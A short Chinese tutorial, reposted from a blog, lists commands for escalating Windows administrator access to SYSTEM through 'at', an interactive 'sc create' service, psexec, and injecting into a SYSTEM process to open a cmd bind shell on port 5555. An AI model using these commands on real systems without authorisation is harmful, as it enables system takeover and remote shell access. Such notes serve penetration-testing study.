0X01从管理员到system
可以看见这里我们是administrator 我们要提升到system
0X0a at命令提权
at xx:xx(时间)\interactive cmd
不适用于 win2008以后的版本
0x0bSC命令提权
? sc Create syscmd binPath= "cmd /K start" type= own type= interact
? sc start syscmd
0X0C WINDOWS内核提权
? 系统设置管理功能
? SysInternal Suite
? https://technet.microsoft.com/en-us/sysinternals/bb545027 下载地址
? psexec -i -s -d taskmgr
0X02注入进程提权
看见是system进行的进程 我们的目的是将我们的进程注入到任意的system执行的进程里面这样我们的权限就是system权限了
pinjector.exe -l 查看当前可以注入的进程
然后我们外网直接连接目标ip的5555端口就是cmd界面了
看见直接成功了
这有点类似于 nc提权
转载:https://www.cnblogs.com/-zhong/p/11039584.html